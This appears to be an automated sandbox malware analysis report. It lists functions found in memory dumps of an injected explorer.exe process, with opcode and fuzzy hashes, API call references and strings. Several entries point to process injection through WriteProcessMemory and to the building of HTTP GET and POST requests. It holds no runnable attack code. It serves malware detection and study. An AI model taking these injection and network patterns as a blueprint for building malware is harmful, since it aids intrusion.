Opcode ID: 5486ad791cdf93dafea879869c05c6ed5ddda5d914f647bf15c0260ea2a54324
Instruction ID: 8b2c8389496702b2a989041d52b9a5b73a9169f4b581801795e9d894cc9989c0
Opcode Fuzzy Hash: 5486ad791cdf93dafea879869c05c6ed5ddda5d914f647bf15c0260ea2a54324
Instruction Fuzzy Hash: 29B159719002168FDB25CF28C8C0BE97BE1FB89344F0985BAED598F25AD770D945DBA0

Uniqueness

Uniqueness Score: -1,00%

Function 01558FB0, Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f483121ff96add6190aac41ec1a4e29fd2b39ff80b59797f4eadfc6f69729e2
Instruction ID: 042ae9f2815d0c1109745b3271544737c41646f422ab583a08f3382aee979e41
Opcode Fuzzy Hash: 4f483121ff96add6190aac41ec1a4e29fd2b39ff80b59797f4eadfc6f69729e2
Instruction Fuzzy Hash: D5914C719002218FD358CF19C498965BBE2FF88324B1AC6EEC55A1F3A6D775A941CF90

Uniqueness

Uniqueness Score: -1,00%

Function 015B9208, Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544242491.015A0000.00000040.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15a0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a3e74fc0bf07cd852e434c63402b7e04ccd1ebb7bd79abfc7c220e7f1ffc386
Instruction ID: 071bb332269242720dbb8f374c8a73e25ad41ecef163b085186c92563a5193da
Opcode Fuzzy Hash: 0a3e74fc0bf07cd852e434c63402b7e04ccd1ebb7bd79abfc7c220e7f1ffc386
Instruction Fuzzy Hash: 399139719002208FD758CF19C4949A5BBF2FF88324B2AC2EEC55A1F3A6D775A941CF90

Uniqueness

Uniqueness Score: -1,00%

Function 01559A33, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d12c4d53c7ddb91f380b3260235dc2736be36add49c6401096b30e8ac3172a3f
Instruction ID: 7dbf5bded668cd92e2d65f35a2ad6b8d4375e114a6b0d9a527a7e0ad915985b2
Opcode Fuzzy Hash: d12c4d53c7ddb91f380b3260235dc2736be36add49c6401096b30e8ac3172a3f
Instruction Fuzzy Hash: C6817D71900210CFD358CF19C498969BBE2FF88324B2AC6EEC45A1F3A7D774A845CB90

Uniqueness

Uniqueness Score: -1,00%

Function 015B9C8B, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544242491.015A0000.00000040.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15a0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db2cb55f055117c668c11c91010d792fa62af5e2a33d20062b58f0c5ed7dc33
Instruction ID: da75b04201903e031020fd2b9041f1f2a7f1fa29b68590290dc2c20b3c5b0fef
Opcode Fuzzy Hash: 5db2cb55f055117c668c11c91010d792fa62af5e2a33d20062b58f0c5ed7dc33
Instruction Fuzzy Hash: 54816C719002208FD358CF19C4D49A9BBE2FF89324B2AC6EEC55A1F376D775A845CB90

Uniqueness

Uniqueness Score: -1,00%

Function 01559543, Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fb4e83201be0ec4cd5b3127a4c35db6fabbd2318627dc00463e0c3681b721a4
Instruction ID: 6adb58f0fe97fdf0a51399178a5313925b992046d6e0443af2f775d9b3daa674
Opcode Fuzzy Hash: 4fb4e83201be0ec4cd5b3127a4c35db6fabbd2318627dc00463e0c3681b721a4
Instruction Fuzzy Hash: 04815B719102108FD358CF19C498969BBE2FF89324B2AC6EEC45A1F3A6D774E845CF90

Uniqueness

Uniqueness Score: -1,00%

Function 015B979B, Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544242491.015A0000.00000040.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15a0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 078562725c4db1ae819644e2d09283f5f460756f027f681fb06401a54087645b
Instruction ID: f2b52e0216a3c6d36d308f88b18a8483f191afca6cfeb848d6eb90be46d3bde7
Opcode Fuzzy Hash: 078562725c4db1ae819644e2d09283f5f460756f027f681fb06401a54087645b
Instruction Fuzzy Hash: CA815D719002118FD358CF19C4D49A9BBE2FF89324B2AC6EEC55A1F3B6D775A841CB90

Uniqueness

Uniqueness Score: -1,00%

Function 01558FAF, Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 590923be1820ce14363d9e67de4e460eaea3fbbcc50f163ed136425ec85b2f09
Instruction ID: e30321f902b15dc1db170cabf9690426b78dd0a4cad9a2ea4ed3a264c7194677
Opcode Fuzzy Hash: 590923be1820ce14363d9e67de4e460eaea3fbbcc50f163ed136425ec85b2f09
Instruction Fuzzy Hash: E4715C729002218FC758CF19C494969BBE2FF88324B1BC2EED45A1F3A6D775A901CF90

Uniqueness

Uniqueness Score: -1,00%

Function 015B9207, Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544242491.015A0000.00000040.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15a0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0422b2c84ae6338381f96574bf0afead6dbb6a8c05b865b4292ad97040f92172
Instruction ID: 1dce7b4e84bb40fe57ed413cba91ab6aee3d3af3b7c57583b70985edc5831d47
Opcode Fuzzy Hash: 0422b2c84ae6338381f96574bf0afead6dbb6a8c05b865b4292ad97040f92172
Instruction Fuzzy Hash: 007171729002208FC718CF19C4949A5BBF2FF89324B1AC2EED55A5F366D775A941CF90

Uniqueness

Uniqueness Score: -1,00%

Function 015A4A87, Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544242491.015A0000.00000040.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15a0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95f62ea56a36f8d448a164cd447bbc9c3c7a2b13149607a3c854cfc77faf005d
Instruction ID: 5f1ab0f62181da8a72be58e3819ab637bd927b184c4b573e61a8cbf4a0ae56c1
Opcode Fuzzy Hash: 95f62ea56a36f8d448a164cd447bbc9c3c7a2b13149607a3c854cfc77faf005d
Instruction Fuzzy Hash: 9251FAB290122DABDB11DFA5CC859DFBBBDEB49310F1081A6E605E7101EB705B85CBA0

Uniqueness

Uniqueness Score: -1,00%

Function 015A4D83, Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544242491.015A0000.00000040.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15a0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 175c115ea777a59fdf5472fc8e4baaae830a16fd0ef746ed468262fdcdf1170d
Instruction ID: 752fabaad0a5cf068c35dc5d2384763937e6432a9530a64637fb8277620dc2be
Opcode Fuzzy Hash: 175c115ea777a59fdf5472fc8e4baaae830a16fd0ef746ed468262fdcdf1170d
Instruction Fuzzy Hash: 7B414B718042A0ABFB169BA68CD4ABB7FF9FB09304FD85469EE44B9162DB700744CF51

Uniqueness

Uniqueness Score: -1,00%

Function 015A4C62, Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544242491.015A0000.00000040.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15a0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffaa1972d7e4264865b6fbc537a9a82b683cbd6f6a46e51e8810b11452a5087e
Instruction ID: a10b04722d374425a9e3a14a23cfe3bc43417b8ec51d645fb30961096550a25b
Opcode Fuzzy Hash: ffaa1972d7e4264865b6fbc537a9a82b683cbd6f6a46e51e8810b11452a5087e
Instruction Fuzzy Hash: 8E415C71904689BFEB11DFB4CC808AFBFF9FF0930075988A8D599D6611D230AA42DB10

Uniqueness

Uniqueness Score: -1,00%

Function 015A3613, Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544242491.015A0000.00000040.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15a0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8bf6a3c8dc48c32eb02a64449c7db618a586e5fc7a7de7f8df6e5eaee62f2bf
Instruction ID: c5bbc600b6fcaf07776a9d558b3cbbc34e69fe6da1fcf9e93d106aa31e7930a3
Opcode Fuzzy Hash: d8bf6a3c8dc48c32eb02a64449c7db618a586e5fc7a7de7f8df6e5eaee62f2bf
Instruction Fuzzy Hash: 5531D42905E3D09EC743C77C98E55867FB2AE0729834F08EAC8C19F477D2599809C7A2

Uniqueness

Uniqueness Score: -1,00%

Function 0156D0BC, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f97fb3e79e9c80ae5c910ab4e5526da41d29ff0ab8fb092ad29fc5897f8018ce
Instruction ID: d76adf979a69c9e405d1081b631c24bcdea39ef35f5e4e7d96c237fe8c82d622
Opcode Fuzzy Hash: f97fb3e79e9c80ae5c910ab4e5526da41d29ff0ab8fb092ad29fc5897f8018ce
Instruction Fuzzy Hash: 6B21B672A00205DFDB10EFA8C8C09ABBBB9FF85360B458968D9959F245DB70F915C7E0

Uniqueness

Uniqueness Score: -1,00%

Function 015A084A, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544242491.015A0000.00000040.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15a0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: b58d2fb4d169c7c51264eee2043052771cba5477a928c48a0f9da369883aa7dc
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 5521B6329502059FDB10EF68C8C09AFBBA5FF45350B8585A8E9599F286D730FA15CBE0

Uniqueness

Uniqueness Score: -1,00%

Function 01543400, Relevance: .0, Instructions: 46timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 015434AC
_aulldiv.NTDLL(?,?,00989680,00000000), ref: 015434CC

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Time$FileSystem_aulldiv
String ID:
API String ID: 2806457037-0
Opcode ID: f6e7043f9798bf61b6233465080ada5bc722d391faccde60139592c00fda8cbb
Instruction ID: d93f3494218e2afdf23b09d89699ceae82fc59aea250bf14be6a831b3ec0a577
Opcode Fuzzy Hash: f6e7043f9798bf61b6233465080ada5bc722d391faccde60139592c00fda8cbb
Instruction Fuzzy Hash: 7D2196710081808AD729DF76C5D1DBB7FE2AF8E21C3B691DDC5814E867D237A44BCA81

Uniqueness

Uniqueness Score: -1,00%

Function 01551CD6, Relevance: 70.2, APIs: 9, Strings: 31, Instructions: 216synchronizationinjectionCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000064), ref: 01551E54
GetCurrentProcess.KERNEL32(00000000,0156EE70,00000003,00000000), ref: 01551E7E
WriteProcessMemory.KERNEL32(00000000), ref: 01551E85
WaitForSingleObject.KERNEL32(00000064), ref: 01551E9C
GetCurrentProcess.KERNEL32(00000000,0156EE70,00000003,00000000), ref: 01551EC6
WriteProcessMemory.KERNEL32(00000000), ref: 01551ECD
WaitForSingleObject.KERNEL32(00000064), ref: 01551EE7
GetCurrentProcess.KERNEL32(?,0156EE74,00000004,00000774), ref: 01551F73
WriteProcessMemory.KERNEL32(00000000), ref: 01551F7A

Strings

t, xrefs: 01551DCD
-, xrefs: 01551D49
], xrefs: 01551CFD
m, xrefs: 01551DA9
1, xrefs: 01551D9D
^, xrefs: 01551DBD
p, xrefs: 01551D6D
5, xrefs: 01551DB5
R, xrefs: 01551D41
F, xrefs: 01551D21
B, xrefs: 01551DB1
E, xrefs: 01551DD1
Z, xrefs: 01551D51
^, xrefs: 01551DF9
[, xrefs: 01551D75
f, xrefs: 01551D7D
/, xrefs: 01551DF1
i, xrefs: 01551D4D
E, xrefs: 01551DC9
O, xrefs: 01551DA1
F, xrefs: 01551D29
p, xrefs: 01551D19
, xrefs: 01551DE9
d, xrefs: 01551EFB
.text, xrefs: 01551F03
4, xrefs: 01551D69
j, xrefs: 01551D71
1, xrefs: 01551D95
~, xrefs: 01551DC5
g, xrefs: 01551D65
u, xrefs: 01551DB9

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Process$CurrentMemoryObjectSingleWaitWrite
String ID: $-$.text$/$1$1$4$5$B$E$E$F$F$O$R$Z$[$]$^$^$d$f$g$i$j$m$p$p$t$u$~
API String ID: 1656869525-2869105978
Opcode ID: 2143aee036235c517341d741e129b13d39c0e248a1369846fd2944d584578aa3
Instruction ID: b278e3b1c574393a588bd63a8df633c82e6e8531699af5a5fb1c092dacbf2a6c
Opcode Fuzzy Hash: 2143aee036235c517341d741e129b13d39c0e248a1369846fd2944d584578aa3
Instruction Fuzzy Hash: D2A17E20C047C9DDDF22C7B8C8887DDBF75AF22224F184299E4A06F2E6C7754946D766

Uniqueness

Uniqueness Score: -1,00%

Function 01554A27, Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 224memorystringfileCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(01598F90), ref: 01554A3E
InterlockedDecrement.KERNEL32(01598F90), ref: 01554CEC

Part of subcall function 01560699: GetTickCount.KERNEL32(00000000,?,?,?,01541441,000004D2), ref: 015606C6
Part of subcall function 01560699: GetTempFileNameA.KERNEL32(00000000,00000000,?), ref: 015606D4
Part of subcall function 01560699: lstrcpy.KERNEL32(00000000), ref: 015606EB

CreateDirectoryA.KERNEL32(00000000,00000000), ref: 01554A70
RtlAllocateHeap.NTDLL(00000000,-00000014), ref: 01554A8A
lstrcpy.KERNEL32(00000000,00000000), ref: 01554A96
lstrcat.KERNEL32(?,0159B557), ref: 01554AA5
CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 01554ABF
RtlAllocateHeap.NTDLL(00000000,00000400), ref: 01554AEC
lstrcpyn.KERNEL32(?,.text,00000008), ref: 01554B02
wsprintfA.USER32 ref: 01554B3D
WriteFile.KERNEL32(?,?,00000000), ref: 01554B55
CloseHandle.KERNEL32(?), ref: 01554B6F
RtlAllocateHeap.NTDLL(00000000,-00000014), ref: 01554B8E
lstrcpy.KERNEL32(00000000,?), ref: 01554B9F
lstrcat.KERNEL32(00000000,0159B5E0), ref: 01554BAB
CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 01554BC2
LoadLibraryA.KERNEL32(0159B5EA), ref: 01554BD9
GetProcAddress.KERNEL32(00000000), ref: 01554BE0
GetCurrentThreadId.KERNEL32 ref: 01554BEE
GetCurrentProcessId.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 01554C12
GetCurrentProcess.KERNEL32(00000000), ref: 01554C19
CloseHandle.KERNEL32(00000000), ref: 01554C25
RemoveDirectoryA.KERNEL32(?), ref: 01554CBA

Strings

crashdump.cab, xrefs: 01554C70
.text, xrefs: 01554AF8

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: File$AllocateCreateCurrentHeaplstrcpy$CloseDirectoryHandleInterlockedProcesslstrcat$AddressCountDecrementIncrementLibraryLoadNameProcRemoveTempThreadTickWritelstrcpynwsprintf
String ID: .text$crashdump.cab
API String ID: 396735169-3143602751
Opcode ID: 563a9434a6c096fe16b857b20e8e1a9cab60e090128723d06482846dab625334
Instruction ID: c4cfce9ae611d3ecd6d6d483ad42a96d5fc758a76a09826a4fd9173877e62236
Opcode Fuzzy Hash: 563a9434a6c096fe16b857b20e8e1a9cab60e090128723d06482846dab625334
Instruction Fuzzy Hash: 18719175005205BFEB219F69DC8AD6F7FA9FB88754F020919F564DB160DB318C08EBA2

Uniqueness

Uniqueness Score: -1,00%

Function 0154FA44, Relevance: 33.3, APIs: 22, Instructions: 339memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0154FA79
RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0154FA92
HeapFree.KERNEL32(00000000,?), ref: 0154FAFF
HeapFree.KERNEL32(00000000,?), ref: 0154FB0F
RtlAllocateHeap.NTDLL(00000000,?), ref: 0154FB22
RtlAllocateHeap.NTDLL(00000000,?), ref: 0154FB35
HeapFree.KERNEL32(00000000,0154842C,00000000), ref: 0154FB85
HeapFree.KERNEL32(00000000,0154842C,00000000), ref: 0154FBDA
HeapFree.KERNEL32(00000000,0154842C,00000000), ref: 0154FC38
HeapFree.KERNEL32(00000000,0154842C,00000000), ref: 0154FC8E
HeapFree.KERNEL32(00000000,?,0159A402), ref: 0154FCDB
RtlAllocateHeap.NTDLL(00000000,?,0159A402), ref: 0154FCF4
memcpy.NTDLL(?,?,?), ref: 0154FD13
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0154FD4A
memcpy.NTDLL(00000000,00000000,00000000), ref: 0154FD62
memcpy.NTDLL(0154842C,?,?), ref: 0154FD7B
memcpy.NTDLL(?,?,00000001), ref: 0154FD9C
HeapFree.KERNEL32(00000000,0154842C), ref: 0154FDB4
HeapFree.KERNEL32(00000000,?), ref: 0154FDD6
HeapFree.KERNEL32(00000000,?), ref: 0154FE10
HeapFree.KERNEL32(00000000,?), ref: 0154FE25
HeapFree.KERNEL32(00000000,?), ref: 0154FE3A

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Free$Allocate$memcpy
String ID:
API String ID: 3303013668-0
Opcode ID: 6f72de2dac877c4d8f862a5e573a31469424dea6934f168a1e928d984d3c3a92
Instruction ID: 277b2759e798d4fec81bc6d99374fcb1fb3edf128f54cc6d76b53047b4ce9acd
Opcode Fuzzy Hash: 6f72de2dac877c4d8f862a5e573a31469424dea6934f168a1e928d984d3c3a92
Instruction Fuzzy Hash: 8FD1D375C0010DEFDF21DFADD8858EEBBBAFB08318B15002AE514AB214D7715E58EBA1

Uniqueness

Uniqueness Score: -1,00%

Function 01553E82, Relevance: 31.9, APIs: 12, Strings: 6, Instructions: 408memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(,?,?,01598FD4), ref: 01553EE9
lstrlen.KERNEL32(Content-Type:,?,?,?,01598FD4), ref: 01553FBD
HeapFree.KERNEL32(00000000,?,?), ref: 0155407C
HeapFree.KERNEL32(00000000,?,?), ref: 015540A9
lstrlen.KERNEL32(?,?,0156EEA0,00000000,?,0156EE8C,00000000,?,00000000,00000000,?,?,?,?,01598FD4), ref: 015540B8
RtlAllocateHeap.NTDLL(00000000,00000004), ref: 015540DE
memcpy.NTDLL(00000000,?,?,?,01598FD4), ref: 015540F2
memcpy.NTDLL(?,?,00000004,?,01598FD4), ref: 01554112
HeapFree.KERNEL32(00000000,?), ref: 0155414B
lstrlen.KERNEL32(?,?,01598FD4), ref: 01554154
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 015542A0
HeapFree.KERNEL32(00000000,00000000,?), ref: 015542E8

Strings

OPTI, xrefs: 01553EC7
PUT , xrefs: 01553EB9
Content-Type:, xrefs: 01553FB4, 01553FB9, 01553FC3
POST, xrefs: 01553EC0
, xrefs: 01553EE4, 01553F1C
GET , xrefs: 01553EB2

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Freelstrlen$Allocatememcpy
String ID: $Content-Type:$GET $OPTI$POST$PUT
API String ID: 3070763056-1504154513
Opcode ID: ee561cb5f72a1aea4d633382bbac278b5c534c987db682f4bd9adea13253b328
Instruction ID: f23a439105e86975427ddf18c2bed8cdd3d43dd6b141c7871d6b3127ee40a64e
Opcode Fuzzy Hash: ee561cb5f72a1aea4d633382bbac278b5c534c987db682f4bd9adea13253b328
Instruction Fuzzy Hash: 26E18E31A0020AAFDF619FA8C894BAEBBB5FF44310F154119E919EF255E731D990DB50

Uniqueness

Uniqueness Score: -1,00%

Function 0154B3BC, Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 235memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0154AFE5: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0154B013

RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0154B422
lstrcpy.KERNEL32(00000000,?), ref: 0154B42F
lstrcat.KERNEL32(?,?), ref: 0154B43B

Part of subcall function 01556F45: lstrlen.KERNEL32(01553C39,00000000,01553C39,00000000,?,?,?,?,?,?,?,?,015541F1,00000000,00000000,?), ref: 01556F4A
Part of subcall function 01556F45: RtlAllocateHeap.NTDLL(00000000,-00000031), ref: 01556F5C
Part of subcall function 01556F45: lstrcpy.KERNEL32(00000030,?), ref: 01556F79

HeapFree.KERNEL32(00000000,?), ref: 0154B587
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0154B59D
lstrcpy.KERNEL32(00000000,Referer: ), ref: 0154B5AC
lstrcat.KERNEL32(?,?), ref: 0154B5B8
lstrcat.KERNEL32(?,0156E5D4), ref: 0154B5C6
HeapFree.KERNEL32(00000000,?), ref: 0154B5EC
HeapFree.KERNEL32(00000000,?), ref: 0154B630
HeapFree.KERNEL32(00000000,?,?), ref: 0154B645
HeapFree.KERNEL32(00000000,?,?), ref: 0154B65A
HeapFree.KERNEL32(00000000,?), ref: 0154B66F

Strings

POST, xrefs: 0154B4C3, 0154B4E0
POST, xrefs: 0154B4BE
GET, xrefs: 0154B4CA
Referer: , xrefs: 0154B5A3
`, xrefs: 0154B534

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Free$Allocate$lstrcatlstrcpy$lstrlen
String ID: GET$POST$POST$Referer: $`
API String ID: 1056556293-4048829369
Opcode ID: 8c1a3523cf090cb8d1267895eb7a534ea3f1a9dd3c3d8ae87d8556221ba03f49
Instruction ID: 84b2838d564968e34b9016c53443417456c852c1be349cc314d4dd1923d85345
Opcode Fuzzy Hash: 8c1a3523cf090cb8d1267895eb7a534ea3f1a9dd3c3d8ae87d8556221ba03f49
Instruction Fuzzy Hash: DD91177590110DBFDF219FA8DC89DAEBFBAFB08344B124029F615AA160C7319954EF61

Uniqueness

Uniqueness Score: -1,00%

Function 01553B96, Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 233memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000001), ref: 01553C14
lstrcpy.KERNEL32(00000000,?), ref: 01553C23
lstrcat.KERNEL32(00000000,01598FD4), ref: 01553C2D

Part of subcall function 01556F45: lstrlen.KERNEL32(01553C39,00000000,01553C39,00000000,?,?,?,?,?,?,?,?,015541F1,00000000,00000000,?), ref: 01556F4A
Part of subcall function 01556F45: RtlAllocateHeap.NTDLL(00000000,-00000031), ref: 01556F5C
Part of subcall function 01556F45: lstrcpy.KERNEL32(00000030,?), ref: 01556F79

memset.NTDLL ref: 01553CBF
SetEvent.KERNEL32(?,0000EA60,?,?,00000AC0), ref: 01553D23
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,015541F1,00000000,00000000,?,00000004,?,?,01598FD4), ref: 01553D7E

Part of subcall function 01556ED3: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000), ref: 01556EEE

SetEvent.KERNEL32(?,0000EA60,?,?,?,?,?,?,?,?,015541F1,00000000,00000000,?,00000004,?), ref: 01553D9F
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01553DBD
HeapFree.KERNEL32(00000000,01598FD4,1DB10106), ref: 01553DD7
HeapFree.KERNEL32(00000000,?,1DB10106), ref: 01553DEC
HeapFree.KERNEL32(00000000,?,1DB10106), ref: 01553E01
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,015541F1,00000000,00000000,?,00000004,?,?,01598FD4), ref: 01553E23
SetEvent.KERNEL32(?,0000EA60,?,?,?,?,?,?,?,?,015541F1,00000000,00000000,?,00000004,?), ref: 01553E4A

Strings

POST, xrefs: 01553C56
POST, xrefs: 01553CA7
GET, xrefs: 01553C5D, 01553C6F
POST, xrefs: 01553C4F
(, xrefs: 01553CD1

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Free$Event$AllocateErrorLastlstrcpy$MultipleObjectsWaitlstrcatlstrlenmemset
String ID: ($GET$POST$POST$POST
API String ID: 75152533-2912010062
Opcode ID: 9fc3fb2333f18738342934bd6f07138606c327b587ee0a3d341dfbf7e0d0f5e8
Instruction ID: a5f2e56174a90a04d0b1e0df8c59930b5baccfd998c7635d3e45f2955b30f025
Opcode Fuzzy Hash: 9fc3fb2333f18738342934bd6f07138606c327b587ee0a3d341dfbf7e0d0f5e8
Instruction Fuzzy Hash: 7191AD30900209EFDBA2DF98CC94AAEBBB5FF44390F154526F919EB264D730A944EB51

Uniqueness

Uniqueness Score: -1,00%

Function 0154E684, Relevance: 29.1, APIs: 23, Instructions: 397COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,?,?,0154DB02,00000000,?,00000000), ref: 0154E715

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: ba8e2ce24892e750b06ecfc38e162a309466392534b3ff869d376b9a0ee90fc9
Instruction ID: acccb655be2fa1f59060bb1720358ebcd8dceb600d394a756e650b18aad55063
Opcode Fuzzy Hash: ba8e2ce24892e750b06ecfc38e162a309466392534b3ff869d376b9a0ee90fc9
Instruction Fuzzy Hash: 31F122B4600602DFD724DF5CC88AD2ABBF5FF48324B058A99E95A8F762C731E814CB51

Uniqueness

Uniqueness Score: -1,00%

Function 0155396C, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 177memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000001), ref: 015539CC
lstrcpy.KERNEL32(00000000,?), ref: 015539D9

Part of subcall function 01556F45: lstrlen.KERNEL32(01553C39,00000000,01553C39,00000000,?,?,?,?,?,?,?,?,015541F1,00000000,00000000,?), ref: 01556F4A
Part of subcall function 01556F45: RtlAllocateHeap.NTDLL(00000000,-00000031), ref: 01556F5C
Part of subcall function 01556F45: lstrcpy.KERNEL32(00000030,?), ref: 01556F79

ResetEvent.KERNEL32(?,?,?,POST,0000EA60,?,?,?,?,?,?), ref: 01553A47
ResetEvent.KERNEL32(?,?,?,?,?,?), ref: 01553A53
RtlAllocateHeap.NTDLL(00000000,?), ref: 01553A79
GetLastError.KERNEL32(?,?,?,?,?), ref: 01553B07
SetEvent.KERNEL32(?,0000EA60,?,?,?,?,?), ref: 01553B28
HeapFree.KERNEL32(00000000,00000000), ref: 01553B47
HeapFree.KERNEL32(00000000,?,?), ref: 01553B5E
